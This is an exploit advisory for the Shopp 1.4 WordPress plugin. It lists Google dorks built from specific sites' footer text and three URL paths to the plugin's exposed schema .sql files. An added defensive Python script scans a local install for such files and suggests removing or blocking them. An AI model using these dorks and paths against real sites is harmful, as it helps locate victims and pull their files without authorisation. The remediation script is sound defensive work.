WordPress Shopp 1.4 Database Disclosure

2018-12-06T00:00:00
ID PACKETSTORM:150663
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-06T00:00:00

Description

`#################################################################################################  
  
# Exploit Title : WordPress Shopp Plugins 1.4 Database Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army  
# Date : 06/12/2018  
# Vendor Homepage : shopplugin.net ~ wordpress.org/plugins/shopp/  
# Software Download Link : downloads.wordpress.org/plugin/shopp.zip  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.4  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/shopp/''  
+ intext:''Site by Stellar''  
+ intext:''© 2018 MKJ Marketing''  
+ intext:''© 2018 Spikenard Farm''  
+ intext:''© KHL 2011 - 2018''  
+ intext:''Powered by: Agency 850.''  
+ intext:''Powered by WordPress. Designed by WooThemes''  
+ intext:''© Copyright 2018, by Altrex. All Rights Reserved''  
+ intext:''Proudly powered by WordPress | Theme: Radiate by ThemeGrill.''  
+ intext:''Website developed by Zero Defect Design LLC''  
+ intext:''This Website is Lovingly Crafted and Maintained by Briers Head Office Staff in Vancouver!''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ]  
CWE-200 - [ Information Exposure ]  
CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/shopp/core/schema/schema.sql  
  
/wp-content/plugins/shopp/core/schema/schema-110.sql  
  
/wp-content/plugins/shopp/core/schema/schema-120.sql  
  
#################################################################################################  
  
# Example Vulnerable Site =>  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`
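
A defender-side check for the paths listed above, as an added example that is not part of the original advisory: it walks a local WordPress tree and reports `.sql` files under `wp-content/plugins`, flagging the three Shopp schema paths. The function names, the `example-plugin/dump.SQL` file and the sample tree are constructed for illustration, and it assumes the web server serves files under the WordPress root as static content.

```python
import os
import tempfile

# Paths listed in the advisory, relative to the WordPress root.
ADVISORY_PATHS = (
    "wp-content/plugins/shopp/core/schema/schema.sql",
    "wp-content/plugins/shopp/core/schema/schema-110.sql",
    "wp-content/plugins/shopp/core/schema/schema-120.sql",
)


def find_exposed_sql(wp_root):
    """Return sorted (relative_path, reason) pairs for .sql files under wp-content/plugins.

    Assumption: the web server serves static files under wp_root as-is, so any
    .sql file found here is downloadable unless a server rule denies it.
    """
    findings = []
    plugins = os.path.join(wp_root, "wp-content", "plugins")
    for dirpath, _dirs, files in os.walk(plugins):
        for name in files:
            if not name.lower().endswith(".sql"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, wp_root).replace(os.sep, "/")
            reason = "listed in advisory" if rel in ADVISORY_PATHS else "other .sql file"
            findings.append((rel, reason))
    return sorted(findings)


def build_sample_tree(root):
    """Create a constructed sample install so the check runs offline."""
    samples = [ADVISORY_PATHS[0], ADVISORY_PATHS[2],
               "wp-content/plugins/example-plugin/dump.SQL",  # constructed name
               "wp-content/plugins/shopp/core/readme.txt"]    # not .sql, ignored
    for rel in samples:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("-- constructed sample\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for rel, reason in find_exposed_sql(root):
            print(f"{rel}: {reason}")
```

Each finding can be closed by removing the file or by a web server rule that denies requests for `.sql` files under the plugins directory.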